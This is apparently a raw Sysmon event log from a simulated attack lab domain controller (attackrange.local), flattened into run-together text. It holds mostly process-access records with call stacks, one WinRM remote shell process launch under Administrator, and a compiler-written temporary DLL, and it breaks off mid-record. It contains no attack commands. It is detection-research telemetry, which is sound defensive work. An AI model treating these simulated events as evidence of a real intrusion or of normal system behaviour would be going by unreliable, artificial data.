13:54:08.833{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003492Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:08.833{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003491Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:08.833{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003490Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:08.833{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003489Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:08.833{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003488Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:08.833{10ACEC4A-853E-5FCF-0500-000000009101}644792C:\Windows\system32\csrss.exe{10ACEC4A-8580-5FCF-AA00-000000009101}4432C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003487Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:08.833{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8580-5FCF-AA00-000000009101}4432C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35069|c:\windows\system32\rpcss.dll+3a852|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000003486Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:08.842{10ACEC4A-8580-5FCF-AA00-000000009101}4432C:\Windows\System32\winrshost.exe10.0.14393.0 (rs1_release.160715-1616)Host Process for WinRM's Remote Shell pluginMicrosoft® Windows® Operating SystemMicrosoft Corporationwinrshost.exeC:\Windows\system32\WinrsHost.exe -EmbeddingC:\Windows\system32\ATTACKRANGE\Administrator{10ACEC4A-8580-5FCF-A596-060000000000}0x696a50HighMD5=F40EC96CA18D88CB1F26FA2070010714,SHA256=607C014A3CA531FFAD50BCD90095C01E4E6B691D9E18473C70E4699CF1E31453,IMPHASH=4216D8E7F36901B61DFD6309B49BCF96{10ACEC4A-8540-5FCF-0C00-000000009101}596C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch 10341000x80000000000000003485Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:08.833{10ACEC4A-853E-5FCF-0B00-000000009101}864100C:\Windows\system32\lsass.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003484Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:08.833{10ACEC4A-853E-5FCF-0B00-000000009101}864100C:\Windows\system32\lsass.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003483Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:08.833{10ACEC4A-853E-5FCF-0B00-000000009101}864100C:\Windows\system32\lsass.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003482Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:08.771{10ACEC4A-853E-5FCF-0B00-000000009101}864908C:\Windows\system32\lsass.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003481Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:08.771{10ACEC4A-853E-5FCF-0B00-000000009101}864908C:\Windows\system32\lsass.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003480Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:08.771{10ACEC4A-853E-5FCF-0B00-000000009101}864908C:\Windows\system32\lsass.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003479Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:08.771{10ACEC4A-853E-5FCF-0B00-000000009101}864908C:\Windows\system32\lsass.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003478Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:08.771{10ACEC4A-853E-5FCF-0B00-000000009101}864908C:\Windows\system32\lsass.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003477Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:08.771{10ACEC4A-853E-5FCF-0B00-000000009101}864908C:\Windows\system32\lsass.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000003476Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.localDLL2020-12-08 13:54:08.380{10ACEC4A-8580-5FCF-A800-000000009101}4556C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeC:\Users\Administrator\AppData\Local\Temp\qo4cdzgk.dll2020-12-08 13:54:08.224 10341000x80000000000000003475Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:08.380{10ACEC4A-857E-5FCF-9D00-000000009101}49404980C:\Windows\system32\conhost.exe{10ACEC4A-8580-5FCF-A900-000000009101}4328C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003474Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:08.380{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003473Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:08.380{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003472Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:08.380{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003471Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:08.380{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003470Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:08.380{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003469Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:08.380{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003468Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 